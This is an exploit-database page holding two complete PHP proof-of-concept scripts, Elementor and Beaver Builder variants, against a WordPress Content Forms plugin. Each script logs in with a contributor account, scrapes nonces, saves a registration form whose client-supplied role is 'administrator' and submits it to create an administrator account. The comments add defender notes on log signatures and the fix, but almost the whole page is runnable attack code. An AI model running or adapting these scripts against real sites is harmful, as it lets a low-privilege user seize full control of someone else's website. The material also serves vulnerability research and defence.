## https://sploitus.com/exploit?id=WPEX-ID:D81D0E72-9BB5-47EF-A796-3B305A4B604F
Elementor PoC

<?php

// Proof-of-concept walk-through, Elementor variant. Takes the site URL, a user
// name and a password from argv, logs in, creates a pending post through the
// REST API, saves an Elementor document containing a Content Forms
// "registration" widget, and finally submits that form to the plugin's REST
// endpoint. The value to notice from a defender's side is "user_role":
// "administrator" inside the widget settings further down: the role is
// supplied by the client as part of the form definition, so a server-side
// fix has to ignore or allow-list that value at submit time instead of
// trusting it. In logs the sequence is a low-privilege session hitting
// wp-admin/admin-ajax.php with action=elementor_ajax, then a POST to
// /wp-json/content-forms/v1/submit.

// Settings
$siteurl = $argv[1];   // target base URL, used verbatim as a prefix for every request
$wp_user = $argv[2];   // login name of the account used (comment below says contributor or higher)
$wp_pass = $argv[3];   // its password


$proxy = '127.0.0.1:8081';   // most later requests are routed through this local proxy, presumably an intercepting proxy for inspection; they fail if nothing listens there
$urlbits = parse_url( $siteurl );
$wp_url = $urlbits['scheme'].'://'.$urlbits['host'].'/';   // NOTE(review): computed but never used in this script

//Json Encode Our New Post
// Body of the REST call that creates the post; status "pending" keeps it unpublished.
$data = array(
    "title" => "Exploit Post",
    "content" => "<!-- wp:paragraph -->\nSample\n<!-- /wp:paragraph -->",
    "status"=>"pending");

$postdata = json_encode($data);

//Get Json post data length
// Sent as an explicit Content-Length header on the REST call below.
$length = strlen($postdata);

echo 'Logging in!';

// 1) Log in as contributor+
// Plain wp-login.php form POST. The session cookies are written to a temp
// cookie jar, and every subsequent request reads and updates the same jar.
$ch = curl_init();
$cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-');
curl_setopt($ch, CURLOPT_URL, $siteurl . '/wp-login.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'log'        => $wp_user,
    'pwd'        => $wp_pass,
    'rememberme' => 'forever',
    'wp-submit'  => 'Log+In',
]);
$output = curl_exec($ch);   // login response is not inspected
curl_close($ch);

echo 'Grabbing Rest API!';
// Pull the Rest API Nonce
// Loads the "new post" editor page only to scrape the REST nonce that
// WordPress embeds in its inline JavaScript.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $siteurl . '/wp-admin/post-new.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);

//Rest API Nonce
// Captures the argument of wp.apiFetch.createNonceMiddleware( "..." ).
preg_match('/wp\.apiFetch\.createNonceMiddleware\(\s"([^"]+)"\s\)/', $content, $matches);
$restnonce = $matches[1];

echo 'Creating New Post and Grabbing Page ID!';
//Create New Post
// POST /wp-json/wp/v2/posts with the JSON built above; the scraped nonce goes
// in X-WP-Nonce so the cookie-authenticated REST call is accepted.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $siteurl . '/wp-json/wp/v2/posts');
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST");
curl_setopt( $ch, CURLOPT_PROXY, $proxy );
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt( $ch, CURLOPT_HTTPHEADER, array(
    'Content-Type: application/json',
    "X-WP-Nonce: $restnonce",
    "Content-Length: $length"));
curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
$test = curl_exec($ch);   // raw JSON response of the created post

//Grab the page-id
// The first "id":<value>, in the response is taken as the new post's ID.
preg_match('/"id":([^"]+),/', $test, $matches);
$pageid = $matches[1];

echo 'Getting Another Nonce!';
// Opens the new post in the Elementor editor (action=elementor) only to scrape
// the Elementor ajax nonce from the page's inline config.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $siteurl . '/wp-admin/post.php?post=' . $pageid . '&action=elementor');
curl_setopt( $ch, CURLOPT_PROXY, $proxy );
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);

//Import Nonce
// Matches "nonce":"..."},"connect in the editor config; group 1 is the nonce.
preg_match('/"nonce":"([^"]+)"},"connect/', $content, $matches);
$elementornonce = $matches[1];

echo 'Adding New User Form!';
// Saves an Elementor document on the new post via admin-ajax.php
// (action=elementor_ajax, inner action save_builder). The document holds a
// single widget of type content_form_registration whose settings define the
// username/email/password fields (field_map user_login/user_email/user_pass)
// and carry "user_role":"administrator". That role is a client-supplied
// setting; whether the server honours it is exactly what this PoC is testing.
// The fixed, very old Firefox user agent string below is static and easy to
// spot in access logs.
$ch = curl_init();
curl_setopt( $ch, CURLOPT_URL, $siteurl . '/wp-admin/admin-ajax.php' );
curl_setopt( $ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13' );
curl_setopt( $ch, CURLOPT_PROXY, $proxy );
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, true );
curl_setopt( $ch, CURLOPT_POST, true );
curl_setopt( $ch, CURLOPT_POSTFIELDS, [
    'actions' => '{"save_builder":{"action":"save_builder","data":{"status":"publish","elements":[{"id":"be9a476","elType":"section","isInner":false,"settings":{},"elements":[{"id":"7ea305d","elType":"column","isInner":false,"settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"6edacb5","elType":"widget","isInner":false,"settings":{"form_fields":[{"key":"username","type":"text","label":"User Name","require":"required","placeholder":"User Name","field_width":"100","field_map":"user_login","_id":"3aef8c5","requirement":"","field_width_tablet":"","field_width_mobile":""},{"key":"email","type":"email","label":"Email","require":"required","placeholder":"Email","field_width":"100","field_map":"user_email","_id":"08c574b","requirement":"","field_width_tablet":"","field_width_mobile":""},{"key":"password","type":"password","label":"Password","require":"required","placeholder":"Password","field_width":"100","field_map":"user_pass","_id":"5f76a2d","requirement":"","field_width_tablet":"","field_width_mobile":""}],"submit_label":"Register","user_role":"administrator"},"elements":[],"widgetType":"content_form_registration"}]}]}],"settings":{"post_title":"BadPost","post_status":"pending"}}}}',
    '_nonce' => $elementornonce,
    'editor_post_id' => $pageid,
    'initial_document_id' => $pageid,
    'action' => 'elementor_ajax'
] );
$output = curl_exec($ch);
curl_close($ch);

echo 'Getting Another Nonce!';
// Renders the post preview on the front end; the registration form markup on
// that page carries the two nonces scraped next.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $siteurl . '/?p=' . $pageid . '&preview=true');
curl_setopt( $ch, CURLOPT_PROXY, $proxy );
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$register = curl_exec($ch);
curl_close($ch);

//Import Nonce
// Hidden input "_wpnonce_registration" in the rendered form.
preg_match('/"_wpnonce_registration"\svalue="([^"]+)"/', $register, $matches);
$registernonce = $matches[1];

//Import Nonce
// Nonce from the contentFormsSettings JS object. The (.)* group is capture
// group 1, which is why the nonce is read from $matches[2].
preg_match('/contentFormsSettings(.)*"nonce":"([^"]+)"}/', $register, $matches);
$formnonce = $matches[2];

echo 'Adding New User!';
// Submits the registration form to the plugin's REST endpoint. form_id is the
// hard-coded widget id "6edacb5" from the JSON saved above, and the data[...]
// keys mirror the field_map names. The response is printed as-is at the end.
$ch = curl_init();
curl_setopt( $ch, CURLOPT_URL, $siteurl . '/wp-json/content-forms/v1/submit' );
curl_setopt( $ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13' );
curl_setopt( $ch, CURLOPT_PROXY, $proxy );
curl_setopt( $ch, CURLOPT_HTTPHEADER, array(
    "X-WP-Nonce: $formnonce"));
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, true );
curl_setopt( $ch, CURLOPT_POST, true );
curl_setopt( $ch, CURLOPT_POSTFIELDS, [
    'form_type' => 'registration',
    'form_id' => '6edacb5',
    'post_id' => $pageid,
    'form_builder' => 'elementor',
    'data[6edacb5][USER_LOGIN]' => 'hax0r',
    'data[6edacb5][USER_EMAIL]' => 'a@a.com',
    'data[6edacb5][USER_PASS]' => 'hax0r',
    'nonce' => $registernonce,

] );
$output = curl_exec($ch);
curl_close($ch);
print_r($output);

?>

Beaver Builder PoC
<?php

// Proof-of-concept walk-through, Beaver Builder variant. Same shape as the
// Elementor script: argv credentials, wp-login.php session, REST post
// creation, then the page builder is driven through its own front-end
// endpoint (?p=<id>&fl_builder) to add a Content Forms registration module
// with settings that include user_role = administrator, publish the layout,
// and submit the rendered form to /wp-json/content-forms/v1/submit. As in the
// Elementor case the client-supplied user_role setting is the thing a server-
// side fix must stop trusting. Log-wise: a low-privilege session POSTing
// fl_builder_data[action]=render_new_module / save_settings / save_layout to
// a post URL, followed by the content-forms submit.

// Settings
$siteurl = $argv[1];   // target base URL, used verbatim as a prefix for every request
$wp_user = $argv[2];   // login name of the account used (comment below says contributor or higher)
$wp_pass = $argv[3];   // its password


$proxy = '127.0.0.1:8081';   // most later requests are routed through this local proxy, presumably an intercepting proxy for inspection; they fail if nothing listens there
$urlbits = parse_url( $siteurl );
$wp_url = $urlbits['scheme'].'://'.$urlbits['host'].'/';   // NOTE(review): computed but never used in this script

//Json Encode Our New Post
// Body of the REST call that creates the post; status "pending" keeps it unpublished.
$data = array(
    "title" => "Exploit Post",
    "content" => "<!-- wp:paragraph -->\nSample\n<!-- /wp:paragraph -->",
    "status"=>"pending");

$postdata = json_encode($data);

//Get Json post data length
// Sent as an explicit Content-Length header on the REST call below.
$length = strlen($postdata);

echo 'Logging in!';

// 1) Log in as contributor+
// Plain wp-login.php form POST. The session cookies are written to a temp
// cookie jar, and every subsequent request reads and updates the same jar.
$ch = curl_init();
$cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-');
curl_setopt($ch, CURLOPT_URL, $siteurl . '/wp-login.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'log'        => $wp_user,
    'pwd'        => $wp_pass,
    'rememberme' => 'forever',
    'wp-submit'  => 'Log+In',
]);
$output = curl_exec($ch);   // login response is not inspected
curl_close($ch);

echo 'Grabbing Rest API!';
// Pull the Rest API Nonce
// Loads the "new post" editor page only to scrape the REST nonce that
// WordPress embeds in its inline JavaScript.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $siteurl . '/wp-admin/post-new.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);

//Rest API Nonce
// Captures the argument of wp.apiFetch.createNonceMiddleware( "..." ).
preg_match('/wp\.apiFetch\.createNonceMiddleware\(\s"([^"]+)"\s\)/', $content, $matches);
$restnonce = $matches[1];

echo 'Creating New Post and Grabbing Page ID!';
//Create New Post
// POST /wp-json/wp/v2/posts with the JSON built above; the scraped nonce goes
// in X-WP-Nonce so the cookie-authenticated REST call is accepted.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $siteurl . '/wp-json/wp/v2/posts');
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST");
curl_setopt( $ch, CURLOPT_PROXY, $proxy );
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt( $ch, CURLOPT_HTTPHEADER, array(
    'Content-Type: application/json',
    "X-WP-Nonce: $restnonce",
    "Content-Length: $length"));
curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
$test = curl_exec($ch);   // raw JSON response of the created post

//Grab the page-id
// The first "id":<value>, in the response is taken as the new post's ID.
preg_match('/"id":([^"]+),/', $test, $matches);
$pageid = $matches[1];

echo 'Getting Another Nonce!';
// Opens the post with the Beaver Builder editor switched on (&fl_builder) only
// to scrape the builder's ajax nonce from the page's inline config.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $siteurl . '/?p=' . $pageid . '&fl_builder');
curl_setopt( $ch, CURLOPT_PROXY, $proxy );
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);

//Import Nonce
// Matches ajaxNonce":"...","builderEnabled in the builder config; group 1 is the nonce.
preg_match('/ajaxNonce":"([^"]+)","builderEnabled"/', $content, $matches);
$beavernonce = $matches[1];

echo 'Getting Node!';
//Getting Node
// Asks the builder to render a new module of the Content Forms registration
// type (fl_builder_data[type] below); the response is parsed for the node id
// the builder assigned to it. The fixed, very old Firefox user agent string
// is static and easy to spot in access logs.
$ch = curl_init();
curl_setopt( $ch, CURLOPT_URL, $siteurl . '/?p=' . $pageid . '&fl_builder');
curl_setopt( $ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13' );
curl_setopt( $ch, CURLOPT_PROXY, $proxy );
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, true );
curl_setopt( $ch, CURLOPT_POST, true );
curl_setopt( $ch, CURLOPT_POSTFIELDS, [
    'fl_builder_data[action]' => 'render_new_module',
    'fl_builder_data[parent_id]' => '0',
    'fl_builder_data[type]' => 'class-themeisle-content-forms-beaver-registration',
    'fl_builder_data[position]' => '-1',
    'fl_builder_data[_wpnonce]' => $beavernonce,
    'fl_builder_data[post_id]' => $pageid,
    'fl_builder_data[fl_builder]' => '1',
    'fl_builder_data[fl_action]' => 'render_new_module'
] );
$node = curl_exec($ch);
curl_close($ch);

//Import Nonce
// Actually the module's node id ("nodeId":"..."), not a nonce; it identifies
// the module in the save_settings call and later as form_id on submit.
preg_match('/"nodeId":"([^"]+)"/', $node, $matches);
$nodeID = $matches[1];

echo 'Adding New User Form!';
// save_settings on the new node: defines the username/email/password fields
// (field_map user_login/user_email/user_pass) and sets
// settings[user_role] = administrator. As in the Elementor variant this role is
// a client-supplied module setting; whether the server honours it is the
// point of the PoC.
$ch = curl_init();
curl_setopt( $ch, CURLOPT_URL, $siteurl . '/?p=' . $pageid . '&fl_builder' );
curl_setopt( $ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13' );
curl_setopt( $ch, CURLOPT_PROXY, $proxy );
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, true );
curl_setopt( $ch, CURLOPT_POST, true );
curl_setopt( $ch, CURLOPT_POSTFIELDS, [
    'fl_builder_data[action]' => 'save_settings',
    'fl_builder_data[node_id]' => $nodeID,
    'fl_builder_data[settings][fields][]' => '{"label":"User Name","placeholder":"User Name","type":"text","field_width":"100","field_width_medium":"","field_width_responsive":"","required":"required","field_map":"user_login","key":"username"}',
    'fl_builder_data[settings][fields][]' => '{"label":"Email","placeholder":"Email","type":"email","field_width":"100","field_width_medium":"","field_width_responsive":"","required":"required","field_map":"user_email","key":"email"}',
    'fl_builder_data[settings][fields][]' => '{"label":"Password","placeholder":"Password","type":"password","field_width":"100","field_width_medium":"","field_width_responsive":"","required":"required","field_map":"user_pass","key":"password"}',
    'fl_builder_data[settings][hide_label]' => 'show',
    'fl_builder_data[settings][submit_label]' => 'register',
    'fl_builder_data[settings][user_role]' => 'administrator',
    'fl_builder_data[_wpnonce]' => $beavernonce,
    'fl_builder_data[post_id]' => $pageid,
    'fl_builder_data[fl_builder]' => '1',
    'fl_builder_data[fl_action]' => 'save_settings'

] );
$output = curl_exec($ch);
curl_close($ch);

echo 'Adding New User Form!';
// save_layout with publish=true: persists and publishes the builder layout
// so the form is rendered on the front end for the next step.
$ch = curl_init();
curl_setopt( $ch, CURLOPT_URL, $siteurl . '/?p=' . $pageid . '&fl_builder' );
curl_setopt( $ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13' );
curl_setopt( $ch, CURLOPT_PROXY, $proxy );
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, true );
curl_setopt( $ch, CURLOPT_POST, true );
curl_setopt( $ch, CURLOPT_POSTFIELDS, [
    'fl_builder_data[action]' => 'save_layout',
    'fl_builder_data[publish]' => 'true',
    'fl_builder_data[exit]' => '1',
    'fl_builder_data[_wpnonce]' => $beavernonce,
    'fl_builder_data[post_id]' =>  $pageid,
    'fl_builder_data[fl_builder]' => '1',
    'fl_builder_data[fl_action]' => 'save_layout'

] );
$output = curl_exec($ch);
curl_close($ch);

echo 'Getting Another Nonce!';
// Renders the post preview on the front end; the registration form markup on
// that page carries the two nonces scraped next.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $siteurl . '/?p=' . $pageid . '&preview=true');
curl_setopt( $ch, CURLOPT_PROXY, $proxy );
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$register = curl_exec($ch);
curl_close($ch);

//Import Nonce
// Hidden input "_wpnonce_registration" in the rendered form.
preg_match('/"_wpnonce_registration"\svalue="([^"]+)"/', $register, $matches);
$registernonce = $matches[1];

//Import Nonce
// Nonce from the contentFormsSettings JS object. The (.)* group is capture
// group 1, which is why the nonce is read from $matches[2].
preg_match('/contentFormsSettings(.)*"nonce":"([^"]+)"}/', $register, $matches);
$formnonce = $matches[2];

echo 'Adding New User!';
// Submits the registration form to the plugin's REST endpoint with
// form_builder=beaver; form_id and the data[...] keys use the node id scraped
// above. The response is printed as-is at the end.
$ch = curl_init();
curl_setopt( $ch, CURLOPT_URL, $siteurl . '/wp-json/content-forms/v1/submit' );
curl_setopt( $ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13' );
curl_setopt( $ch, CURLOPT_PROXY, $proxy );
curl_setopt( $ch, CURLOPT_HTTPHEADER, array(
    "X-WP-Nonce: $formnonce"));
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, true );
curl_setopt( $ch, CURLOPT_POST, true );
curl_setopt( $ch, CURLOPT_POSTFIELDS, [
    'form_type' => 'registration',
    'form_id' => $nodeID,
    'post_id' => $pageid,
    'form_builder' => 'beaver',
    'data[' . $nodeID . '][USER_LOGIN]' => 'hax0r4',
    'data['. $nodeID .'][USER_EMAIL]' => 'a4@a.com',
    'data['. $nodeID .'][USER_PASS]' => 'hax0r',
    'nonce' => $registernonce,

] );
$output = curl_exec($ch);
curl_close($ch);
print_r($output);

?>